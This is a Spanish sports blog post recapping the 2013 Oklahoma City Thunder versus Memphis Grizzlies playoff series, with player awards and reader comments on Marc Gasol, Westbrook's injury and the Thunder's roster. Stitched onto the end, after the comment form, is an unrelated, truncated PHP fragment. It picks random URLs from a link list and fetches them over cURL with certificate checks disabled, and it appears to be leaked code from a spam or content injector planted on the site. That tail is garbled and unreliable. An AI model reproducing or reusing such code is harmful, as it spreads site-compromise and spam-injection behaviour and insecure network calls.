Resumen Oklahoma City Thunder 1 – 4 Memphis Grizzlies

17 de May de 2013 por Sancho88

¡Menudo patinazo que nos dimos (bueno, me di, pero los fracasos siempre quedan mejor cuando se asumen en la primera persona del plural) en el pronóstico! El 4-3 del análisis no tiene nada que ver con lo que realmente ha sucedido, y es, simple y llanamente, que los Grizzlies son el mejor equipo del Oeste (hasta que Spurs demuestren lo contrario). Ya no hay ninguna duda de que estos Memphis Grizzlies van a por el anillo de campeones, y, además, es difícil cuestionar que ahora mismo Marc Gasol se ha consolidado, no como uno de los 5 mejores centers de la competición (que ya lo era), sino, con bastante probabilidad, como el mejor pívot del planeta. Sí, hay señores que se llaman Bynum, Howard, Horford, López… bla, bla, bla. Ninguno de ellos está aquí (Hibbert probablemente llegue a las finales, pero la comparación hace daño al intelecto), y no es ser ventajista, es que Oklahoma ha caído como un muñeco gracias, en gran parte, a la influencia brutal de un solo hombre: Marc Gasol.

Simplemente, el mediano de los Gasol es una muralla. Atrás es una bestia, un verdadero ‘Grizzlie’ de 2,15 metros de las montañas canadienses de Vancouver lanzando ‘zarpazos’ a diestro y siniestro. Imposible para OKC meterse debajo del aro, y cuando lo hacían, era en momentos puntuales aprovechando descansos de Marc o intentando sacarle personales.Y cuando lo hacían, recuerdo a Marc abofeteando con su tríceps grasiento (de arrastrador de camiones Pegaso) en la cara de Durant, o agarrar por el brazo a los que intentaban entrar en su casa. Y en ataque, pues Marc ha dado un clínic. De repente, ha sacado toda la agilidad que le permite su brutal cambio físico (quién lo diría viéndolo en su etapa de high school), y ahora es totalmente imparable. Cuando un señor saca cosas de Shaquille O’Neal, de Arvydas Sabonis, de Pau Gasol, de Vlade Divac (y no sigo que si no me vais a dar p’al pelo y eso que no tengo), es indudable que no puedes hacer nada para pararlo.

Y si a Marc le añadimos todo lo que veíamos en la previa que podían hacer estos Grizzlies contra los Thunder, el resultado es la barrida que hemos visto. Tan solo flaquearon los Grizzlies en el primer juego, con un Mike Conley desastroso, y un Tony Allen en su versión ‘paquete’, que cada día saca menos, por cierto. Aún así, solo los dioses piadosos del basket le dieron una oportunidad a ‘KD’. El 1-0 parecía un espejismo, un bocadillo de aire, un petit suise de chorizo y caramelos. Y así fue, la victoria de Oklahoma en el primer juego solo fue una recompensa a una temporada dura con la marcha de Harden, la lesión de Westbrook y la sensación de que a Sam Presti se le han acabado los conejos dentro de la chistera.

Ibaka nos ha parecido una mentira ofensiva en esta serie, un jugador absolutamente incompetente en el 1×1, una vergüenza ajena a 5 metros de canasta y totamente ‘flotado’, un bochorno en sus ya habituales fallos con palmeos a medio metro del tablero o sus mates ‘fail’ (38% en TC); no obstante, atrás sí que le ha echado testiculina para no dejar postear a Marc y Zach. Aunque, realmente, no sabemos si era Serge que los sacaba a ellos, o Zipi y Zape jugando con el pobre hispano-congoleño. Scott Brooks nos ha parecido un absoluto incompetente desde el banquillo, todo un mariscal sin recursos, un general sin ideas, un estratega que deja solos a sus chicos en el campo de batalla. Y así caen los proyectos deportivos, por falta de liderazgo. Porque la evidencia es que Memphis ha vacilado a Oklahoma, les han dejado una vida como a los ratones, han jugueteado con ellos, pero al final les han lanzado un zarpazo como el que recibieron los Clippers. Que se dice pronto, pero muchos consideraban tanto a Oklahoma como a los Clippers favoritos a todo por el Oeste, pero la realidad es que Memphis les ha pasado por encima a ambos.

Así, Memphis remontó el ‘blackout’ colectivo de los últimos dos minutos del primer partido, y a partir de ahí se pusieron a trabajar para darle la vuelta a la serie en tan solo 5 partidos. ¿Y cómo lo hicieron? Se preguntarán muchos. Pues muy fácil. Simplemente dejaron a los Thunder en menos de 90 puntos (106 de media en RS), en menos del 40% de acierto en tiros de campo (48% en RS) y en robos, tapones, asistencias y rebotes también cayeron en picado. No podemos obviar la no inclusión de Westbrook, obviamente, pero a estas alturas del cuento no valen las excusas. OKC era peor equipo y Memphis se impuso por su juego colectivo.

Ahora mismo los osos pivotan sobre tres piezas que encajan a la perfección, no solo por su ‘IQ’ individual, sino por su gran entendimiento dentro de la pista. Así como Bryant, Odom y Gasol levantaron varios campeonatos en base a una química de equipo muy particular, estos Grizzlies no van desencaminados. El trío Conley-Marc-Randolph maniató estrategiamente todos los planteamientos del rival, y en el apesadumbrado camino, Durant se hizo mortal, entregó la cuchara en el tercer encuentro de la serie y rozó el 40% en tiros de campo durante las semifinales, algo inaudito en él. Demasiado solo para superar a tal equipazo. En los momentos finales, como ya se ha comentado en las crónicas, ‘Durantula’ en vez de picar como el año pasado, se dedicaba a tirar ‘castañazos’ sin ninguna fe ni confianza, y a deambular cabizbajo en la transición defensa-ataque. Era un ser exhausto.

Todo eso lo provocaron los Grizzlies, la depresión de los elegidos; en este caso, la depresión de Kevin Durant. Sea como sea, todos confiamos en Memphis a partir de ahora, y la serie contra Spurs va a ser un combate épico. El Oeste se merecía acabar así, con 7 partidazos a vida o muerte entre el mejor equipo colectivo de los últimos tres lustros (Spurs), y un futurible mejor equipo para el próximo lustro (Grizzlies). Bye Bye Durant…

Premios

MVP: Aquí siempre aparecía Kevin Durant, pero eso se acabó. En realidad, nos podríamos quedar con cualquiera de los ‘tres tenores’. Conley espabiló a partir del segundo juego y lideró la dirección del equipo con 18 puntos, 6,4 rebotes, 6,8 asistencias y más de 2 robos por encuentro (aunque con porcentajes pésimos). Por su parte, Randolph fue el ‘Rey del rebote’ y terminó con 18-11 la serie, además de su gran último juego (28-14) que sirvió para cerrar la eliminatoria a favor de Memphis. Sin embargo, la personificación real del juego de estos Grizzlies es Marc Gasol. Sus estadísticas no son normales y reflejan realmente todo lo que aporta tanto en ataque como en defensa. 19,5 puntos, 8,5 rebotes, 2,5 asistencias, 1,6 robos y casi 3 tapones por partido. Esos números nos dicen que fue injusto que no fuera al All-Star este año, pero qué más da. Hay un nuevo debate que la historia terminará de ajustar. ¿Quién fue mejor, Pau o Marc? Dificilísima respuesta.

La sorpresa: Quincy Pondexter. Sus 7 puntos y 2 rebotes por partido no parecen gran cosa, pero este hombre es clave en la rotación de Lionel Hollins, pues siempre la mete cuando más daño hace al rival. Y mucho daño hizo a Oklahoma en sus 20 minutos de media en pista gracias a un gran porcentaje de triples (7/13, 53%), que supera, curiosamente, a su porcentaje de tiros libres (40%). Fue el que mejor tiró desde fuera en una eliminatoria no demasiado prolija en ese aspecto, y por eso se merece ser la sorpresa del resumen.

El rookie: Normalmente esta sección la obviamos en los resúmenes de Playoffs, pues nos dejan poca chicha, hay pocos novatos por estas rondas del señor. Pero, simbólicamente, es nuestra obligación dejarle un sitio en la historia al pequeño Reggie Jackson. 14 puntos, 6 rebotes y 4 asistencias que triplican su aportación con respecto al resto de la temporada. Un ejemplo de madurez deportiva de un rookie que dará que hablar durante los próximos años.

La decepción: La pareja interior de Oklahoma. Contra Ibaka ya hemos cargado durante el resumen, así que le daremos el premio al pegote de carne Kendrick Perkins. Ahora que el gobierno va a poner etiquetas en las botellas de alcohol indicando que perjudican seriamente la salud, esperemos que en Estados Unidos también tomen medidas para retirar del mercado a semejante desfachatez baloncestística. No se me ocurren ejemplos, pero no sé, Desagana Diop parece incluso bueno al lado de esta cosa. 17% en tiros de campo durante la serie. Es para dejarlo abandonado en el aeropuerto de Memphis. En fin.

El mayor esfuerzo en vano: Kevin Durant. A pesar de su encomiable esfuerzo, no ha podido meter en las finales a este grupo de mediocridades. Bajó, no obstante, sus prestaciones con respecto a la primera ronda, pero es normal descansando apenas 2 minutos por partido. Aún así, su 29-10-7 de media está al alcance de casi nadie. Qué pena que no estuviera Westbrook, porque probablemente habríamos llegado al séptimo. No podemos olvidar tampoco que Durant firmó malísimos porcentajes para lo que nos tiene acostumbrados (42%) y 4,5 pérdidas por partido. Esas cosas ocurren cuando Allen, Prince y Pondexter se van turnando para defenderte, y cuando logras pasar a uno de ellos, Hollins te pone a otro delante o simplemente aparece Marc. Imposible generarse tiros fáciles en estas circunstancias.

Comenta

26 comentarios a esta entrada

  1. Denise dice:
    #1

    Marc es ahora mismo el mejor pivot de la NBA, y esto dice mucho de la bajada de calidad en las pinturas de la NBA.
    Aún siendo un gran jugador, para mí está a años luz de por ejemplo la mejor versión de Pau, y de O’Neal ó Sabonis ni hablo.
    Es un buen jugador, no hay dudas, pero no es un killer que pueda echarse en ataque el equipo a las espaldas y promediar ventipicos puntos de media, ni siquiera es un jugador con unos % de tiros exquisitos. Tampoco tiene tantos movimientos en la pintura.
    Es un tío con una gran etica de trabajo, pasa bien, defiende bien, rebotea normal, y ataca medio-bien, pero no es un martillo pilón constante que siempre están ahí…sino que unos días anota 8, al otro 20, al otro 11….

      Citar

  2. TheDeerHunter dice:
    #2

    Pues no se que decirte. Yo todo lo que he visto de Marc este ha año me ha dejado con el culo torcido y eso que consideraba que lo conozco bastante. Alucinante. Desconozco qué puede envidiar alguna de las exhibiciones recientes a ningún pívot.
    De hecho, sin ir más lejos, el impacto defensivo le pega unas cuantas vueltas a las mejores exhibiciones que les he visto a los que nombras en esta competición (a Sabonis sí le ví hacer muchas de esas aquí en Europa)
    En cuestión de distribución todos los que han nombrado han sido excelsos, pero a ninguno les he visto ser tan protagonistas en ese sentido. Habría que analizar qué porcentaje de jugadas se generan desde sus manos. Increíble.
    En cuanto a juego puramente individual/ofensivo coincido en que es inferior a aquellos, pero nadie se puede quejar del papel y el rendimiento que aporta por ahí tampoco.

    Por otro lado, al hilo del análisis, no caigamos el error de juzgar tan duramente a los Thunder. Cualquier equipo, el que sea, debe notar la baja de un jugador de la talla de Westbrook, más teniendo en cuenta la concepción de la plantilla. Creo que Brooks ha intentado un montón de cosas, pero sencillamente Memphis tenía mimbres para destrozarles desde muchos puntos de vista.
    En este caso lo veo como mérito de Memphis exclusivamente. Los Thunder sin Westbrook son inferiores. Puede que nos demos cuenta pronto que eso les puede pasar a algunos más.

      Citar

  3. Laker1624 dice:
    #3

    En mi opinión Marc aun no ha alcanzado el nivel del mejor Pau. Probablemente el mediano de los Gasol es mejor defensor de lo que su hermano mayor ha sido y será, pero en cuanto a recursos ofensivos y capacidad anotadora aun lo veo bastante lejos de Pau. Dudo que los Thunder hubiesen pasada de ronda aun contando con la participación de Westbrook, seguramente si habrían ganado mas de un partido. En mi opinión, Oklahoma dio un paso atrás con el traspaso de Harden, no lo critico porque desconozco los motivos reales de tal operación (me refiero sobretodo a si Harden realmente tenia voluntad de permanecer en el equipo) y pienso que las circunstancias no ayudaban.

      Citar

  4. Denise dice:
    #4

    Yo estoy con Deer, se le estan dando palos gratuitos a unos Thunder sin Westbrook que han perdido sus 4 partidos por muy poca diferencia y en los instantes finales.
    Sobre la comparación Pau-Marc, la he sacado a colación porque me sorprende en foros, blogs (no este) que se le empieza a catalogar a Marc como que ha superado a Pau, cuando creo que el mayor, aún a estas alturas de la película con 33 años, anota más, tiene mas calidad ofensiva, mas movimientos, mas velocidad, pasa y distribuye mucho mejor, y rebotea muy bien cuando le sale de las pelotas.
    En la defensa si es inferior Pau, pero por norma general Pau siempre ha sido jugador franquicia ó escudero y por tanto, entiendo que no puede defender tan al limite para no cargarse de faltas y sobretodo tomar un poco de aire en defensa para estar mas fresco en ataque.
    Marc ahora mismo es muy importante en los Grizzlies, pero si anota 8 puntos y apenas tira a canasta, no pasa nada porque para anotar ya está Z-Bo y Conley (antes Rudy Gay)

    Y alguien sabe que pasa con Adriá?? Las últimas noticias que tengo es que estaba en una Universidad angelina, más por enchufe que por su calidad. No sé si era un bulo ó habrá mejorado ya algo.

      Citar

  5. melo15 dice:
    #5

    Muy de acuerdo con todo lo dicho sobre Marc.
    A mi, personalmente su Regular Season me habia dejado muchas dudas, sobre todo porque 7 rebotes para un tio de 2,15 me parece una muy mala cifra.
    Pero en estos PO se le ha visto su version mas dominante y creo que en conjunto y con Bynum y Howard lesionados, si es el mejor pivot de la NBA, aunque en mi opinion Brook Lopez le anda cerca.

      Citar

  6. melo15 dice:
    #6

    Decir que seguramente los Thunder hubieran conseguido forzar el septimo con Westbrook sano, me parece un desproposito. Se le sigue infravalorando mucho y este año ha sido uno de los 5 mejores jugadores de la liga (con Parker)
    Creo que con Westbrook los Thunder habrian ganado a los Grizzlies en 6 partidos.
    Mucha suerte ha tenido Memphis en estos Playoffs, primero con la lesion de Griffin y despues la de Westbrook.

      Citar

  7. Laker1624 dice:
    #7

    Sin ánimo de ofender y con todo el respeto, no me parece menos despropósito decir que los Thunder hubieran eliminado a los Grizzlies en seis encuentros con Westbrook, que decir que los Thunder hubieran forzado el séptimo partido con Westbrook. Es decir, creo que los Thunder habrían caído igualmente, pero tampoco me habría sorprendido que hubieran pasado con Westbrook. De hecho, creo que pocos daban un 4-1 para los Grizzlies antes de que comenzara la eliminatoria, y sabiendo ya de la lesión de Westbrook.

      Citar

  8. Denise dice:
    #8

    melo15: Mucha suerte ha tenido Memphis en estos Playoffs, primero con la lesion de Griffin y despues la de Westbrook.

    +1000 para Melo y no tengo nada en contra de los Grizzlies, ojala ganen el anillo.

      Citar

  9. Laker1624 dice:
    #9

    Considero que el tema de las lesiones de Clippers y Thunder ha sido un factor importante en ambas eliminatorias, sobretodo en el Thunder-Grizzlies. Creo que Memphis hubiera pasado sin muchos mas apuros aunque Griffin hubiera estado al 100%, y contra Thunder también creo que habrían pasado, aunque sufriendo mucho mas. Contra San Antonio creo ya no van a poder.

    A propósito de Griffin, me parece un jugador muy sobrevalorado. En el aspecto técnico me parece un jugador muy limitado hoy por hoy, y creo que jugadores como por ejemplo Randolph están por encima de Griffin actualmente. Aunque pienso que tiene muchísimo potencial y puede llegar a ser un gran jugador.

      Citar

  10. rumbero dice:
    #10

    Pero que el tema lesiones es el pan de cada día en PO. Le ha pasado a Memphis pero Spurs se ha encontrado con unos Lakers sin Kobe y unos Warriors sin Lee y varios tios entre algodones y Miami por ejemplo unos Bulls en la enfermería, etc Pasan y son decisivas y decir ahora si hubieran pasado estos o los otros es jugar a adivinos y en este blog me parece que no somos muy buenos en eso 😀

      Citar

  11. txusma dice:
    #11

    Pues habrá que preguntarse si esta es la NBA que quieren Stern y Silver. 82 partidos para que luego lleguen muchos cascados al final y no podamos ver a los mejores? Y encima multan a Popovic si da descanso a los buenos…

      Citar

  12. melo15 dice:
    #12

    Yo no dijo que sea justo o no, pero lo que esta claro es que han tenido mucha suerte.
    Me reafirmo, los Thunder habrian eliminado en 6 o 5 partidos a los Grizzlies con Westbrook.
    No solo por el hecho de tener a Russell si no por todo lo que eso conlleva.
    Con RW Durant llega mucho mas fresco a los ultimos cuartos, se genran muchos mas espacios para Ibaka y Martin y los Thunder juegan mucho mas motivados.

    Posiblemente los Grizzlies tambien habrian ganado a los Clippers con Griffin sano, pero les habria costado mucho mas.

      Citar

  13. kreakone dice:
    #13

    @Sancho gran análisis! Siempre es un placer leerte, aún me estoy descojonando con lo de dejar al cacho de carne de Perkins en el aeropuerto 😉

    @Laker1624, totalmente de acuerdo contigo. Son bajas importantes para Clippers y Thunder pero uno (Griffin) me parece un buen jugador, sobrevalorado y que sobretodo en playoff se le amplifican mucho más sus limitaciones, y el otro (Westbrook) aunque es un factor determinante en Thunder y en la liga, creo que al nivel al que se ha puesto Memphis en estos playoffs, habrían pasado la eliminatoria igualemente.

      Citar

  14. GreenPride dice:
    #14

    Un gran análisis de la eliminatoria.
    Para mí ha habido dos claves muy claras:
    1.- Dominio interior de Marc&Zach sobre los Thunder en general. Ibaka ha hecho lo que ha podido en defensa pero en ataque ha estado horrible y Perkins… todo lo malo que podamos decir sobre él se queda en poco. En ataque una absoluta nulidad que por no hacer ni bloquea en condiciones y en defensa no ha podido en ningún momento con ningún Grizzlie, de hecho Collison ha vuelto a jugar mucho mejor que él. La pareja de los de Memphis ha campado a sus anchas dominando el rebote y anotando y generando muchísimas canastas. Marc ha estado genial y Z-Bo ha puesto puntos y lucha interior a raudales. Son la clave de estos Grizzlies y con los dos sanos como ya dije en la previa de la temporada están al nivel de cualquiera.
    2.- Defensa Grizzlie (sobre todo sobre Durant) Si bien en los primeros partidos Durant se las apañó para anotar con fluidez a partir del tercero la defensa ajustó mucho más sobre él viendo que el resto de jugadores Thunder eran muy poco resolutivos. Durant hizo todo lo que puedo incluyendo asistir a sus compañeros pero acabó desquiciado y fuera de la elimiinatoria ante unos Grizzlies que mandaban 2 o 3 jugadores a por él en cada jugada. Sin él sólo Reggie Jackson ha ayudad en tareas ofensivas y alguna vez Kevin Martin. Brooks intentó por todos los medios acelerar el ritmo de los partidos para poder anotar pero ante una defensa tan buena eso no sirve siempre.
    Y ahora la cuestión Westbrook. ¿Que habría pasado con él en cancha? Nunca se sabe Desde luego eliminatoria mucho más igualada y de resultado incierto. Yo creo que habría estado muy al límite aunque insisto que el gran fallo de los de OKC fue darle a Perkins la pasta que debería haber sido para Harden…. Ahora a ver qué hacen, supongo que no renovarán a Martin e intentarán hacerse con un agente libre más o menos de calidad que ayude a Westbrook&Durant pero de parecer el equipo del futuro a finales de la temporada pasada a las dudas que despiertan ahora hay un abismo….

      Citar

  15. MagicJohnson32 dice:
    #15

    Con Westbrook, yo creo que los Thunder era clarísimos favoritos y que habrían ganado. No digo fácil, porque contra estos Grizzlies nunca es fácil, pero sí de manera clara.

      Citar

  16. HisRoyalAirness dice:
    #16

    Gran análisis Sancho (qué desilusión me he llevado con lo de que no tienes pelo, te imaginaba cual DiCaprio en Titanic, camelador de jovencitas).

    Lo de la suerte de los Grizzlies toca un poco las narices, la verdad.
    Westbrook? Han demostrado sobradamente poder defender a jugadores exteriores (CP3, Crawford…) y no creo que por ahí hubiesen perdido la eliminatoria. Podía estar más disputada? Sin duda pero aquí lo que se ha visto es un EQUIPO frente a otro MUY descompensado. Algunos llevamos diciendo el bluff que es Ibaka desde hace dos años pero nada…lo que el año que viene cobraran los 2 interiores de los Thunder es más de lo que cobrará Howard, 7 millones más que Marc etc, etc. El contrato de Ibaka es una aberración para un tío que no tiene ningún talento ofensivo y defensivo es lo más sobrevalorado que hay.
    A parte de el trío que menciona Sancho hay que destacar a los otros 2 miembros del quinteto: Prince y Tony “la lapa” Allen, tipos sacrificados por el bien común y defensores férreos donde los haya.

    Y habláis de Griffin en Playoffs como si fuese Tim Duncan con 24 años. Los Clippers tenían mucha más plantilla y recursos que los Grizzlies pero peor aprovechados. Lo que pasa es que siempre ha habido jugadores de RS que llegados los PO se desinflaban y otros que aumentaban sus prestaciones al máximo. Esos son los grandes

      Citar

  17. Simon dice:
    #17

    HisRoyalAirness:
    Gran análisis Sancho (qué desilusión me he llevado con lo de que no tienes pelo, te imaginaba cual DiCaprio en Titanic, camelador de jovencitas).

    Lo de la suerte de los Grizzlies toca un poco las narices, la verdad.
    Westbrook? Han demostrado sobradamente poder defender a jugadores exteriores (CP3, Crawford…) y no creo que por ahí hubiesen perdido la eliminatoria. Podía estar más disputada? Sin duda pero aquí lo que se ha visto es un EQUIPO frente a otro MUY descompensado. Algunos llevamos diciendo el bluff que es Ibaka desde hace dos años pero nada…lo que el año que viene cobraran los 2 interiores de los Thunder es más de lo que cobrará Howard, 7 millones más que Marc etc, etc. El contrato de Ibaka es una aberración para un tío que no tiene ningún talento ofensivo y defensivo es lo más sobrevalorado que hay.
    A parte de el trío que menciona Sancho hay que destacar a los otros 2 miembros del quinteto: Prince y Tony “la lapa” Allen, tipos sacrificados por el bien común y defensores férreos donde los haya.

    Y habláis de Griffin en Playoffs como si fuese Tim Duncan con 24 años. Los Clippers tenían mucha más plantilla y recursos que los Grizzlies pero peor aprovechados. Lo que pasa es que siempre ha habido jugadores de RS que llegados los PO se desinflaban y otros que aumentaban sus prestaciones al máximo. Esos son los grandes

    Estoy de acuerdo en todo al 100×100, incluso en lo de Sancho… jajajaja

      Citar

  18. Sancho88 dice:
    #18

    Y si os digo que voy a ser papá y aún no tengo 25 años? entonces ya sí que os cagais eh? jejejej.. Espero que no me salga un juergas y un grescas a lo JR. Smith o Rasheed Wallace, jejeje.

      Citar

  19. Sancho88 dice:
    #19

    Si es niño lo primero que le voy a enseñar es un cencerro y una camiseta de Jason Williams, para que no se confunda que luego no quiero líos, que si me sale de los Lakers o los Celtics me da algo… jejeje

      Citar

  20. HisRoyalAirness dice:
    #20

    Sancho88:
    Y si os digo que voy a ser papá y aún no tengo 25 años? entonces ya sí que os cagais eh? jejejej.. Espero que no me salga un juergas y un grescas a lo JR. Smith o Rasheed Wallace, jejeje.

    Me acabas de dejar de piedra, soy yo mayor y no me veo con un churumbel ni loco!
    Aún te va a salir de los Knicks o peor, de los Heat, y eso sí que no tiene salida.

      Citar

  21. Ruxixón dice:
    #21

    MagicJohnson32:
    Con Westbrook, yo creo que los Thunder era clarísimos favoritos y que habrían ganado. No digo fácil, porque contra estos Grizzlies nunca es fácil, pero sí de manera clara.

    No sé si habrían ganado pero que la serie hubiera sido totalmente distinta es cierto.Solamente con el hecho de que la defensa de Memphis estuviera pendiente de un jugador más y no solamente de KD,el guión hubiera sido otro.No habría tantas ayudas para tapar a Durant,Conley se hubiera agotado más e igual no hubiera sido tan resolutivo en ataque….pero bueno,las lesiones son parte de este juego y mismamente no hace mucho Randolph llegó limitadísimo en su estado físico y los Grizz cayeron con los Clippers.

    Me alegro por Lionel Hollins que siempre ha estado infravalorado por aquí,por la decisión de traspasar a Rudy Gay lo que ha permitido explotar a Conley -mucha cera le dimos-,a Bayless -si,si,ese jugador en su dñia de los Blazers-,aprovechar más al juego interior…

    Me sorprende el rendimiento de Reggie Jackson y me abre dudas de cara al futuro,¿tendrá suficientes minutos con Westbrook recuperado?Un combo junto Perkins más la ronda puede ser interesante para tener un jugador de baloncesto en el 5.

      Citar

  22. Sancho88 dice:
    #22

    Ruxixón: No sé si habrían ganado pero que la serie hubiera sido totalmente distinta es cierto.Solamente con el hecho de que la defensa de Memphis estuviera pendiente de un jugador más y no solamente de KD,el guión hubiera sido otro.No habría tantas ayudas para tapar a Durant,Conley se hubiera agotado más e igual no hubiera sido tan resolutivo en ataque….pero bueno,las lesiones son parte de este juego y mismamente no hace mucho Randolph llegó limitadísimo en su estado físico y los Grizz cayeron con los Clippers.

    Me alegro por Lionel Hollins que siempre ha estado infravalorado por aquí,por la decisión de traspasar a Rudy Gay lo que ha permitido explotar a Conley -mucha cera le dimos-,a Bayless -si,si,ese jugador en su dñia de los Blazers-,aprovechar más al juego interior…

    Me sorprende el rendimiento de Reggie Jackson y me abre dudas de cara al futuro,¿tendrá suficientes minutos con Westbrook recuperado?Un combo junto Perkins más la ronda puede ser interesante para tener un jugador de baloncesto en el 5.

    Pienso que Reggie Jackson debe ser un jugador importante en estos Thunder. No sería descabellado buscar un traspaso RW por Howard.

    Jackson-Lamb-Durant-Ibaka-Howard… habría ahí muchísimo material en la zona no?

    Y bueno, habrá habido palos contra Hollins, pero también creo que el clima general es de apoyo a su trabajo, al menos yo siempre lo he valorado porque hace las cosas sensatas, ha confiado en Marc y Randolph en todo momento y ha demostrado que sin egos como Gay él podía armar un equipo aspirante al anillo, así que pase lo que pase contra San Antonio, Hollins ya ha hecho una campaña excelente y creo que tardaremos mucho tiempo en olvidar esto.

      Citar

  23. MagicJohnson32 dice:
    #23

    Howard es agente libre, no puede haber traspaso con él. Aunque igual os referís a un traspaso en el futuro, cuando Howard ya tenga un contrato con los Lakers o con quien sea.

    De todos modos, no veo a Westbrook fuera de OKC. Vuelvo a decir que con él sano, los Thunder ganaron el Oeste, así que no veo motivos para tocar el equipo por ahí cuando es precisamente una de las cosas que realmente funcionan. Lo que sí es evidente es el problema interior y de banquillo.

      Citar

  24. Jose Luis dice:
    #24

    Hombre Magic, lo mismo se refieren a un sign & trade no? Obteniendo así Howard el máximo.

      Citar

  25. MagicJohnson32 dice:
    #25

    No puede haber sign & trade. El último convenio limita las opciones de S&T para equipos por encima del límite salarial. Por eso lo digo.

      Citar

  26. Jose Luis dice:
    #26

    Vale, no sabía eso. Gracias por el apunte, además veo lógica la medida.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>